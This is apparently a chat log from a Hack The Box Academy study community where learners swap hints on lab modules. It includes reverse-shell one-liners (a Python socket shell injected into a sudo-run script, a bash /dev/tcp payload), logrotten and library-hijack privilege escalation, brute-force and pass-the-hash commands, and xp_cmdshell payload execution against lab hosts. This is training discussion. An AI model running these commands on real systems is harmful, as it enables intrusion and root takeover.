and the ip i am using is the ip of the vpn
i feel like i should use a different port
The IP of your VM on the VPN interface, yes
The Port is fine
VPN interface,
and also
i missed this part because there was no file: logger@nix02:~$ grep "create|compress" /etc/logrotate.conf | grep -v "#"
The IP already looks right. I think you used the IP of your VM on the VPN interface (usually tun0).
??
In Skill assessment question:
SSH to 10.129.. with user "user2" and password ""
what is the meaning of password ""
Q: If you search and find the name of this host, you will find the flag for user2.
I think password = flag from user1
yes you are right! Thanks 🙂
@acoustic owl even after creating the file it removes by itself? ./logrotten -p ./payload ./backups/access.log
Waiting for rotating ./backups/access.log...
Renamed ./backups with ./backups2 and created symlink to /etc/bash_completion.d
Waiting 1 seconds before writing payload...
htb-student@ubuntu:~$ ls
backups backups2 logrotten payload super.c
htb-student@ubuntu:~$ ls
backups logrotten payload super.c
is this behaviour normal? @acoustic owl @silent scarab
Yes, that is what happened to me too
User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them.
I am able to list all files but how can I check the content of the flag.
ugh it's getting on my nerves now
Ignore! got it! 🙂
Password Attack - medium lab. I'm in the ||jason|| user and I need to log in with dennis's credentials. I read the document carefully but no idea 🤷♀️
In my mind I need to get id_rsa (for dennis) to get privilege and log in as root via ssh because all my skills to get privilege for jason don't work … so i need to show any dir for dennis but I don't have permission … dig more or am I on the wrong road?
Hello everyone, I just went over the "Documentation & Reporting" module in prep for the CPTS. I was wondering about the logging of the shell output. I don't like tmux and I belong to the mad people that use like 5 different terminal windows with 4 tabs each all over the place. So far I only found script -a filename and tee -a filename for logging my stuff to be useful. Which do have some issues with the ohmyzsh and powerlevel10k theme, because of the autocomplete being shown in the logs with ^H everywhere. Does anyone have any other recommendations? I am using the xfce terminal, but I was thinking of using a 2nd terminal like terminator to have a black on white default profile for screenshots when raw output isn't really working out. Maybe there is a good ohmyzsh plugin?
nc -nlvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.129.204.41 50942
root@ubuntu:~# ^C
i was about to have a connection
and got it
I use lazagne.exe in cmd,
when I start lazagne.exe all it pops up the lazagne window, but after a few seconds it closes automatically
how do I fix it?
open cmd
run this command
.\lazagne.exe all
Anyone can give me hints?
If I remember correctly Dennis can be bruteforced
Not entirely sure what password file it was though
anyone worked with Miscellaneous Techniques
Passive Traffic Capture
I did a brute force and I don't have any login
hydra -l dennis -P mut_pass.list ssh://IP
Which module?
There might be a password file that you can find somewhere
Password attack-medium lab
See what services are running local on the server
I know ||Mysql|| and when logging in with all credentials I found nothing happened
hey buddies, sorry for asking a lot, but i finally figured it out, i just want to know why i am getting this error?? the path is fine!! edit: i am at Attacking Common Services - Hard
and I reviewed the Footprinting module … I think this is a new idea, I will learn it
Hmm? you are probably making a mistake here. Send me the command you are using via DM, then I'll have a look at it
Now I'm learning about how this server works. my question is: am I on the right road!
Thanks I’ll DM u
Sanity check please
Attacking common applications- Attacking Thick Client Applications
Trying to drag/drop the .bin file into de4dot.exe ..
I've set it up so it runs in powershell fine, changed x64dbg settings and restarted it, followed the memory map and tried all MAP + -RW-- type files
But it's always saying not .net framework on all exported .bins
Guidance of what I'm missing appreciated
Inboxes welcome
Is it because system should be capital S? Also, can't you just do dir C:\Windows.... without needing to chain commands
Edit: Never mind the capital S thing 😂
Nice... Did chaining commands work? I've never tried it in cmdshell to be honest
In the Learning Process module's page about The Brain, it mentions two common myths about the brain, and right afterward it goes on to say:
One of the best-known examples is Einstein, who we know was terrible at math and learned very slowly throughout his school career, unlike the others.
But isn't that also a myth that has been disproven?
should i buy the htb academy student pass or htb vip subscription, which is better for a beginner
academy if you want to learn. Otherwise if you have knowledge how to attack boxes, go with VIP.
oh ok i think i have to go academy then thanks
one more question: does practicing htb help in real life scenarios
Academy is more realistic
ayo
i need help can someone help me ?
in stack based buffer overflow linux x86
can anybody help me ?
Real basic one, where is the password supposed to SSH in?
I have tried "" and no password and both do not work.
Module: INTRODUCTION TO WINDOWS COMMAND LINE
hey can you help me
in this question " How large can our shellcode theoretically become if we count NOPS and the shellcode size together? (Format: 00 Bytes)"
in stack based buffer over flow linux
password = Flag from user2
Anyone happen to knock out the Logrotate section on the Linux PE module? I noticed there isn't a /etc/logrotate.conf on the target
for DNS enumeration using python, DNS records & queries, first question asks "Investigate all records for the domain "inlanefreight.com" with the help of dig or nslookup and submit the one unique record in double quotes as the answer.", what does unique record mean?
i'm trying both dig and nslookup and I see nothing in double quotes...
thanks - was being an idiot
You need to find another way to find out when the logs are rotated. Have a look at the user directory
What exactly dig command did you send?
I tried just dig inlanefreight.com, then I tried the different record types i.e. dig A inlanefreight.com
but it's unclear what unique record it's referring to
Which records use quotation marks?
found it, kind of wish that was clearer what it wanted...
thank you!
Better if you ask the question
File transfer - windows
was playing around the "Windows File Transfer Methods" section of the "File Transfer" module in the academy.
Using the WebDav Python module I created a WebDav share using
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
which was provided from this section.
Then I tried to connect to this share from the victim's windows powershell using
dir \\<my-tun0-ip>\DavWWWRoot
command, which was provided from this section.
I keep getting a "network path was not found" error. Has anyone run into this issue???
Can someone give me a tip which wordlist to use for the ftp attack in attacking common services
I used many inclusive wordlists from resources
Section Attacking FTP?
Lists are available on the FTP server
Hey guys, looking for a little pointer for Linux Privilege Escalation Module for the final test, currently on flag 4
how do i find the file path for the .bashrc file
Do you know how to see hidden files on Linux?
What module are you doing?
linux fundamentals
thx found it
Well -a would do it but I prefer la
You’re welcome 👍🏼
Hey, not sure if this is the best channel for this. But anyone know if there are more cloud focused modules in the pipeline? Things specific to what you might run into in the cloud labs (Cyclone, Blizzard, Hailstrom)?
Can someone tell me why we do not use /usr/bin/php 🤔 ?
Someone here can help me? I have this message and I am disconnected from the server:
client_loop: send disconnect: Broken pipe
Because php is already in our user path
Yeah but how can I know I have to use /bin/sh???
I mean logically speaking: what is the shell
you would have to ask HTB Staff. We students do not know what HTB plans
Also if you use gtfobins it's just doing the "I believe" and sending it
Thanks, yeah didn't know if there were any staff in the discord channel.
What?
gtfobins is a compiled site with a bunch of different Linux binaries and how to escape them to root
Yes and?
Look in the user list under HTB Staff
Anyway the reason for /bin/sh is: it's the shell...
Like that's it
That's the only reason for it
Just because we use a shell?
Because you're using a bash shell, yes
:p you're telling php to pull its commands from bash
Alright so when it's php we do this?
Technically speaking when you run that command you drop into a shell session within a php session
Yep
Well, thanks.
Btw I tried to do the knowledge test from getting started without msf but I did not find how to log in as admin.
I found the password + username but nothing, it was not working :(.
I was trying to do it like before in Nibbles.
I attempted that, wasn't able to get anything working. Could just be me misconfiguring it, couldn't find anything in forums on it either.
but it doesnt show as link
Password Attack - Hard lab. What should I do when I've cracked the password of the BitLocker file ||Backup.vdb||?
Mount this drive
SQLMap Module Skills Assessment. I've discovered the flag in the final_flag table but when I submit it comes back as incorrect. Can anyone DM me the flag to sanity check?
What type of SQL injection did you do? Blind?
hint: there is a grep filter command in that script, remove that and you should see the flag if the script is sending ||post|| requests, because hint: the flag isn't in a ||pdf file||
or you can modify the grep command a bit for it to filter the flag and the wget thing in the script will download the flag for you
Blind time based with a tamper script and no cast
yeah this is a known (for me) send me the flag for that and if it's wrong i'll send you the right flag
Hello,
Just wanna double check
So my account on Academy is not related to the HTB Labs account or?
Checking cuz of the progress credit thing
you would need to re-run it a few times I guess
make sure to use --flush-sessions, to make sure you're actually re-running it
the flag for that has a typo and i have no idea how many times i saw this error get reported but i guess it's a feature not a bug
if you are new here read #welcome and #rules after that use /verify at #bot-commands and you will get access to the other channels
as you may already know time based attacks sometimes can produce incorrect results
yea but (i think) as far as i can remember everyone i helped with this issue had the flag with the same typo
in such cases, it would be better to explain the type of attack
and the margin of error
Can't mount with this command dislocker -V file.vhd -u password -- /root/bit_loker_decrypt
I think my password is wrong?
Attacking common applications - Attacking Thick Client Applications? stuck on using dnspy. the file isn't a .net pe file
i have no idea what i'm doing wrong. I've tried and dumped everything i could
Can you check the md5 sum of the backup on the box and on your host?
OMG it's possible to change? I used evil-winrm to make it impossible to change but I'll check now
also give this a try if you need help mounting that #modules message
If my password is ||1******!|| should it work? Because I'm waiting a lot of time for john to finish cracking but it's still working
How do i get started
Same
Hallo
I'll try to solve it
Mounting on windows is easier if you can’t get it done on Linux
I ended up mounting it on my windows host
Bruv anyone tell me how to get started
I'll try to learn a lot
first step don't spam and if you are new here read #welcome and #rules after that use /verify at #bot-commands and check /start-here also at #bot-commands
||yep||
I could use nmap with proxychains and it is fine, but rdesktop....
Are you sure that’s the right ip?
thanks, I am fucked up...
no you just need some red bull
maybe burnt out
I used proxychains with rdp today
Requires user password when writing this command dislocker /dev/loop0p2 -u ||1””””!|| -- /media/bitlocker
try without the space after -u, so -u(password) like in my example
You're amazing, man
Thanks all for helping me in this module, I appreciate that 🌹
http://dontasktoask.com/ try to ask a better question next time, but from your previous post i'm guessing you already logged in via ||**sql|| and if you haven't got RCE then hint: get RCE, but if you already have a shell then you can just continue trying the previous exploits that you mentioned
great question, and you got RCE in the mssqlclient shell right? hint: just make something like a meterpreter shell and upload / run it
sure you can try something like hoaxshell there is no AV to bypass but i just use that tool because i can get a quick and stable powershell payload + rev shell
or you can use something like netcat.exe and you can just use the binary that comes with kali (or parrot on the pwnbox) or the given foothold machine in your case
yep same with the meterpreter rev shell if you used one
did you output the file into the C:\Windows\Temp\ directory?
also this is exactly what i use for this
first, why? and just try the default temp directory, this isn't a shared lab so you don't have to do this, and also did you confirm the directory has been made?
but why would you need to switch to that folder? if you have nc.exe at C:\Windows\Temp\ you can just use C:\Windows\Temp\nc.exe (rev shell tag) to get a shell
i must be doing something dumb. this seems easy. stuck on the "enumerating password policies" section where they are asking for the minpwdlength. i run the crackmapexec smb command and i get a traceback error on my attack machine. i run that same command on the victim machine and get no output. i ran enum4linux on both machines with no output either. what am i doing wrong?
i mean if you have then you can just use that syntax to get a shell without needing to change directory and if you want to use nc.exe to get a shell you can just wget that binary from your box and output it there and get a shell
which module and section are you on?
active directory enumeration and attacks/enumerating and retrieving password policies
oh sorry about that, but hint: you can use the example cme command, the main thing is the last tag, but those creds in the example will also work so you can just use that, or you can use ldapsearch and the main tag is shown in the example
thanks
what are these names "MS01, DC01" in the AD enumeration and attacks Module? are these directories or subdomains or what?
So, i am currently studying the "WINDOWS FUNDAMENTALS" module but i don't really know how to approach it.
Do i have to study and remember nearly everything or just understand it?
For example, should i learn all system main processes that run on windows or do i just have to know how processes work on windows?
what the hell is that? 🤣
when i use drupalgeddon where do i need to use the creds?
http://drupal-qa.inlanefreight.local/node?destination=node i am trying to login here
and it says wrong credentials
just use something like
xp_cmdshell "C:\Windows\Temp\reverse.exe"
Hoaxshell, from https://github.com/t3l3machus/hoaxshell
John hammond made a video on it
wait what? how is that hoaxshell??
I dunno
yeah i know i have been using the tool for a while now but i never saw that
Maybe there's a command that outputs that or smthn
99% of the time i use the tool it just outputs a base64 encoded payload
i use the linux version and tbh i do that too (actually no, even on windows i b64 it)
if you base64 decode the payload for some reason, just don't, and try xp_cmdshell (hoaxshell payload)
Can someone help me connect to a VPN so I can get access to starting point?
Sure, whatchu need help with specifically?
read #welcome and #rules after that use /verify at #bot-commands and ask that at #starting-point
and did you see any request on your python server? because the error message is very clear about what the issue is
yeah give me a sec i'll double check this and send you a dm
Oh my, you guys have been working on this for a long time, huh @vital adder
I pray for your sanity
nah i got used to this
Alright, I am in the footprinting hard lab and have a few questions. When you run an nmap -p- IP it doesn't show any SNMP, yet if I run an snmpwalk, I get a bunch of info. Just wondering if normally I should see an SNMP port open in nmap before I attempt SNMP enumeration
yes I had the same problem. try using different wordlists
okay
the only issue is, when I give it the hash in hashcat it says it can't use it because it's not valid
That's because SNMP is UDP
yup
so how would i fix that?
is that why?
Run a -sU scan it should show the port
don't worry about hashcat for now. the module hasn't gone over hashcat yet. I did the same thing. continue on msfconsole and play with some other wordlists.
alright
will do. wow I never run -sU scans and for some reason I thought -p- runs both U and T
it doesn't
No, -p- will scan all ports but it's a TCP scan
because a -p- -sU would take an eternity
well big win on learning something valuable today
I have a doubt, can anyone help me on how I should ping a machine in academy?
wdym?
not able to ping the ip
so should I add it to my pentest methodology? Obviously I totally missed it. Wonder if -sU with specific ports would be valuable
cause udp is a stateless protocol there's no built-in failure condition to know a port is open, and it could just be taking a while for the service to respond, so udp scans take forever cause there's a delay in listening for a reply.
on top of that some services only respond if they receive proper data, so the only way to talk to them and know they're there is to throw a bunch of common service protocols at the port
so UDP takes forever
rip lol
I usually only scan for the most common of udp ports
thats what I need for sure
I don’t think we’re able to wget or curl things from attack host to target
what module is this?
What section of the module is this?
show your openvpn command output.
oh it's pwnbox
that's a public docker container, it won't respond to ping
yeah you'd just curl or ssh into it then
or web browser
depending on the section
also you should technically not reveal the ip and port when you're doing a docker container section cause someone else could mess with your lab if they're being a dick
Next question. when it comes to braa, the SNMP enum tool, for some reason I don't understand the OIDs that it uses. Here is a snip of some of the data from snmpwalk. What of this is the OID?
iso.3.6.1.2.1.25.1.7.1.2.1.4.6.66.65.67.75.85.80 = ""
iso.3.6.1.2.1.25.1.7.1.2.1.5.6.66.65.67.75.85.80 = INTEGER: 5
iso.3.6.1.2.1.25.1.7.1.2.1.6.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.7.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.20.6.66.65.67.75.85.80 = INTEGER: 4
iso.3.6.1.2.1.25.1.7.1.2.1.21.6.66.65.67.75.85.80 = INTEGER: 1
At least it often fails for me
for instance, a command I would run based on this would be:
braa backup@10.129.202.20:3.6.1
Unable to process queries: Invalid OID: '3.6.1'!
Hello everyone. I'm having some trouble in the password module. I'm supposed to find the contents of the david.txt file. It's supposed to be done by pass the hash. The hash I have is correct. But how am I supposed to pass the hash using mimikatz? I'm not able to understand the syntax for it
https://blog.netwrix.com/2021/11/30/passing-the-hash-with-mimikatz/
dunno if this would help but I googled it and this is what I found. Might be worth a try to research some syntax
I'm performing the same thing mentioned here. I did it by sshing as administrator. Is that the mistake I'm making? Am I supposed to perform it by RDPing into the system?
Haven't done that one yet. would say that is worth a try
I’ll give it a shot then
oh man. So i have gotten into the IMAP server with a user gained from SNMP. their inbox has nothing of value
hi!!!!!
i need a bit of help completing the environment enumeration chapter from the linux priv esc module
i've searched EVERYWHERE but I can't find anything
please @me if you're up to help, thanks!!!
@fallow sun
Noobie question: The command to hide errors was 2>/dev/null?
is there any expert in linux privesc around? I'd like to get a hand in finding a hidden (either in plain sight or actually hidden) file containing a flag in the enumeration chapter of the linux privesc module in the htb academy. i'm really stuck rn and i've almost checked every file i've found. maybe i just don't know where to search :(
...maybe
lemme recheck
it should be that syntax
i did use the 2>/dev/null thingy
but i remember seeing that sometimes that can throw some output that actually does contain something funny
is there any places to learn about privilege escalation besides HTB for now? I can't afford the cubes right now since I want to do fundamentals instead.
read the link lol
you did the same thing again with your second question
la -la
sorry i'm kinda dumb ok i promise i will not do it again
don't need to apologize or promise anything to me
it's a guide on how to ask better questions so YOU are more likely to get the help you actually need
just ask ur question xd
its legitimately a good read
if u give details of what u have to do and what u tried, with the link, better
ok sorry i'm just frustrated ok?
I actually skipped enumerating that question, got all the way to root, and then just grepped the entire filesystem for flags
Q: how can i read hidden files in linux
A: In Linux, hidden files are typically denoted by a dot (.) at the beginning of their filenames. These files are hidden by default in many file browsers and directory listings. However, you can still access and read hidden files using various methods. Here are a few ways to do so:
- Command-line: You can use the `ls` command with the `-a` (or `--all`) option to display all files, including hidden files, in a directory: `ls -a`. This will list all files, including hidden files, in the current directory. You can then use standard file reading commands (`cat`, `less`, etc.) to read the contents of the hidden files.
- File browser: If you're using a file browser or file manager, you can usually enable an option to show hidden files. The specific method varies depending on the file browser you're using. For example, in the Nautilus file browser (used in Ubuntu), you can press `Ctrl+H` to toggle the visibility of hidden files.
- Specific file access: If you know the path and name of a hidden file, you can directly read its contents using standard file reading commands. For example: `cat /path/to/.hiddenfile`. Replace `/path/to/.hiddenfile` with the actual path and filename of the hidden file you want to read.
Remember that hidden files are often hidden for a reason, and modifying or deleting them without proper knowledge and understanding can potentially cause issues. Exercise caution when working with hidden files, especially those related to system configuration.
so what i'm doing rn is trying to find a flag hidden somewhere in this machine. i'm supposed to enumerate a distinct variety. the question is: how do I find a secret flag? where should i look?
find /* -name "flag.txt" 2>/dev/null
wouldn't that be too obvious?
idk i don't even know what module u are doing
have u used linpeas or linenum?
perhaps i should try that, maybe
have u tried something
that is the first thing they teach in the section
no its not
i was trying to do it without tools yk
We should, though, practice our manual enumeration as much as possible and create (and continue to add to) our own cheat sheet of key commands (and alternatives for different Linux operating systems). We'll start to develop our own style, command preference, and even see some areas that we can begin to script out ourselves.
yeah the module says that yea maybe i should use linpeas, but i want to do it the manual way
ok ok you got me
then do it manually
I am doing the network enum module and i was stuck at the Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.
My mistake was not waiting with nc and just iterating over all found open ports with tcpdump too quickly. As a general rule of thumb, how long should one wait on nc for usable information?
Hi guys, is it explained in a module how to have persistent access to a machine? Like C2 or other?
dude they went mad with this
@zinc marsh could you try to find the flag?
you probably have more experience in this
If you're not going to follow the instructions in the module, then you might as well just skip the questions.
I did run linpeas after all
it too didn't find anything useful
my point is that maybe it did but I just don't see it
am doing other module
but as he told just follow the section
it is a question of +0 cubes
it's not about cubes it's about getting better, yk?
but I understand what you're saying, I've been stuck on this for quite a while, maybe I should try just going forward ig
It means what it means lol
.
Flags are in the format HTB{fl4g_g03s_h3r3}
You can do it manually using tools like grep, or rg
anyone done the XSS or SQL Injection Fundamentals? The firefox browser and chromium from burpsuite in Kali seem to hang indefinitely when sending a payload.
Interestingly, visiting the website from firefox on my host and using the same payload works fine and I instantly get the response.
Hi guys, I have a problem with the Windows Fundamentals module. I try to mount the shared directory that I had to create and share from the Windows machine, but using the command (and editing the parts of it that are supposed to be edited), I get this error:
mount: /home/htb-ac-52628/Desktop: mount(2) system call failed: Operation now in progress.
I'm using the following command:
sudo mount -t cifs -o username=htb-student,password=Academy_WinFun! //IPWindows/"Company Data" /home/htb-ac-52628/Desktop/
(with IPWindows the IP of the Windows machine)
Do you guys know what I did wrong (ping me)? All good.
I have a question in the Linux Privilege Escalation module. It's the Path Abuse section. The question asks "Review the PATH of the htb-student user. What non-default directory is part of the user's PATH?" I'm not sure what they mean by the "non-default directory" here or what we're supposed to do to find it?
Hello guys, I'm currently in the Passwords module and working on the Credential Hunting on Linux chapter. In the hint it gave me a password and username; I tried to login with it but they seem to be wrong. In the forum someone mentioned to run custom.rule on it. Even though I ran it I didn't find any valid password at all. Am I missing something? It'd be very helpful if you can give me a nudge.
DM u
Check the path of the htb-student and compare it against another user or look up what the default path is for a user on Linux
Thank you. I was able to figure it out with some help.
Hi, is there a way to contact the authors of a module pls?
You can use #858470491676737536 to submit corrections to a module
So I am on Getting Started and the Types of Shells sections. I barely understand anything at first glance and I know I won't get it right off the bat. But should I be doing other ones first? Or is this good for starting off?
I would say it will be a bit confusing while you're reading it but once you start doing the exercises you'll clearly understand them.
watch some yt videos for more clarification if needed
Module: Attacking Common Applications
Section: Attacking GitLab
Question: gain remote code execution on the GitLab instance? Submit the flag in the directory you land in.
Here, I found a user named D*** using the gitlab_userenum script. I have used the exploit mentioned in the module, but I am unable to achieve any RCE. The authentication is failing when I run the exploit. Could it be because I need a working password or a different user? I have been trying to make it work since yesterday. Can someone please help me? --------------------------------SOLVED------------------------------
Hello I want to learn hacking
ok?
How much time does it take to become a hacker
Couple of weeks and you’re good to go
am not able to run this as sudo: sudo /usr/bin/python3 mem_status.py
[sudo] password for htb-student:
Sorry, user htb-student is not allowed to execute '/usr/bin/python3 mem_status.py' as root on ubuntu.
sudo -l
Matching Defaults entries for htb-student on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User htb-student may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/python3 /home/htb-student/mem_status.py
htb-student@ubuntu:~$
EVEN tho it's shown (ALL) NOPASSWD: /usr/bin/python3 /home/htb-student/mem_status.py
check and see what perms are on the file
-rw-rwxr-x 1 htb-student htb-student 327 Jun 23 08:16 mem_stats.py
sudo python3 mem_stats.py
[sudo] password for htb-student:
Sorry, user htb-student is not allowed to execute '/usr/bin/python3 mem_stats.py' as root on ubuntu.
There is your answer. I'll let you figure out the rest
```python
#!/usr/bin/env python3
import psutil
available_memory = psutil.virtual_memory().available * 100 / psutil.virtual_memory().total
print(f"Available memory: {round(available_memory, 2)}%")
import socket,os,pty;s=socket.socket();s.connect(("10.129.205.114",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
```
wdym
nowait wait
it's not running it even though it should've let me run it without a password
am stucckk
Name of module and section, not a link
Linux Privilege Escalation: Python Library Hijacking
I added this: Module Contents - Hijacking
```python
...SNIP...
def virtual_memory():
    ...SNIP...
    #### Hijacking
    import os
    os.system('id')
    global _TOTAL_PHYMEM
    ret = _psplatform.virtual_memory()
    # cached for later use in Process.memory_percent()
    _TOTAL_PHYMEM = ret.total
    return ret
```
but still: sudo /usr/bin/python3 ./mem_status.py
[sudo] password for htb-student:
Sorry, user htb-student is not allowed to execute '/usr/bin/python3 ./mem_status.py' as root on ubuntu.
Can you chmod 777 mem status?
What does it say?
it changed the permissions but still didn't run as sudo
you need to give the full path
I tried
sudo /usr/bin/python3 /home/htb-student/mem_stats.py
sudo /usr/bin/python3 /home/htb-student/mem_stats.py
[sudo] password for htb-student:
it's asking for the pass
waitt
I figured
for me it's working just fine, it's not asking for the password
It works now?
Hi, I have a problem with this module https://academy.hackthebox.com/module/176/section/1779
just ran it as sudo :sudo /usr/bin/python3 /home/htb-student/mem_status.py
uid=0(root) gid=0(root) groups=0(root)
Traceback (most recent call last):
File "/home/htb-student/mem_status.py", line 4, in <module>
available_memory = psutil.virtual_memory().available * 100 / psutil.virtual_memory().total
AttributeError: 'NoneType' object has no attribute 'available'
so like if I add: import socket,os,pty;s=socket.socket();s.connect(("<local-ip>",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
is it going to give me a root shell
ayo another thing
create our own psutil module containing our own malicious virtual_memory() function within the /usr/lib/python3.8 directory.
but it's not letting me crete a psutil.py file
*create
did you list the directory permissions?
yess sir
it says root usr only
wait
what
oh yeah give me a sec
drwxr-xr-x 30 root root
I don't think you can write anything in that folder unless the "others" have a writable bit set
so how am I supposed to hijack module contents
read the section module, I'm not on it now
it's telling me to create your own psutil module containing our own malicious virtual_memory() function within the /usr/lib/python3.8 directory.
did you check if you can modify the env variable?
just found a folder where we do have permissions
I guess even the user folder can do the job
u sure ??
why not? You have permission to write
yes
ugh: sudo PYTHONPATH=/tmp/ /usr/bin/python3 /home/htb-student/mem_status.py
sudo: sorry, you are not allowed to set the following environment variables: PYTHONPATH
!
That was in case you could change the env variable so you could write the ".py" file there
hey another thing
if I am able to run this as sudo it means I can add this import socket code and get the root connection, can I?
got it baby htb-student@ubuntu:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.129.205.114 59106
root@ubuntu:/home/htb-student#
@fiery berry thanks bud
sa
I am stuck at the skills Assessment of File Upload attacks.
Try to exploit the upload form to read the flag found at the root directory "/". https://academy.hackthebox.com/module/136/section/1310
I have found the source code of php file with XXE attacks and everything in general, but I can't bypass mime type for my payload.
I tried prepending various bytes (like jpg, png) with no success. What am I missing here?
Tried changing the magic bytes? Feel free to pm what u have I'll nudge you
hey
am a bit confused as they want me to escalate the privileges with the help of sudo but it looks like they don't have gcc installed so how am I supposed to compile the exploit?
Hi all! anyone has already solved the new update on Linux Privilege Escalation about logrotation/logrotten? (https://academy.hackthebox.com/module/51/section/1589) I'm doing everything as the lesson describes, but I can not find any writable log file to do the trick
what prob are u facing?
with logrotate:
cat /etc/logrotate.conf - no result,
sudo cat /var/lib/logrotate/status (user is not a sudoer, so permission denied)
ls /etc/logrotate.d/ -> shows me info and I look deeper -> these 3 logs have root privileges:
-> /var/log/ubuntu-advantage*.log
-> /var/log/dpkg.log
-> /var/log/alternatives.log
find / -name *.log -ls 2>/dev/null | sort -n -> this shows me 2 more interesting log files under /home/htb-user/backup
but I don't see rotation on them
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/home/htb-student/.gnupg/pubring.kbx
/home/htb-student/.gnupg/trustdb.gpg
/var/log/ubuntu-advantage-timer.log
/var/log/journal/49967d13a6e2400c9aa2ce8a2a217dbe/system.journal
/var/log/journal/49967d13a6e2400c9aa2ce8a2a217dbe/user-1000.journal
/var/log/syslog
/var/log/apport.log
/var/log/auth.log
/var/log/kern.log
/var/log/lastlog
/var/log/wtmp
when I use logrotten as described in the lesson, it gets stuck waiting for rotation of the log, but the logs never rotate and it stays stuck waiting
gotta use the metasploit lol
I tried with ~/backup/access.log, but stuck waiting for rotation
yess
ok now
open the ssh session in another terminal
and then echo hi >> ~/backup/access.log
and dont forget to keep the rotation
running
Thanks for helping! I'm going to try now.
np let me know if u need any help
hi. I need help in the WINDOWS EVENT LOGS & FINDING EVIL module in the Get-WinEvent part. I'm stuck at the first question and I could really use some clue
can u send me the link
never even touched that module
thanks anyway
Hello, I'm in PIVOTING, TUNNELING, AND PORT FORWARDING --> RDP and SOCKS Tunneling with SocksOverRDP and I'm trying to put dll libraries in the machine but I have an error
please could somebody give me help?
Is it auto deleting the dll?
YES
rotate works, but not opening session
Consider why this is happening, some type of protection is still on?
I tried the command in an independent session, and the command works well:
this command, but with my actual VPN IP: echo 'bash -i >& /dev/tcp/10.10.14.2/9001 0>&1' > payload
Okay, thank u
I solved it but the module doesn't say anything about it, I will report the incident
It's a fairly common problem I've seen people run into, including myself, but I figure it's part of teaching out-of-the-box thinking
try to echo the same thing in the access.log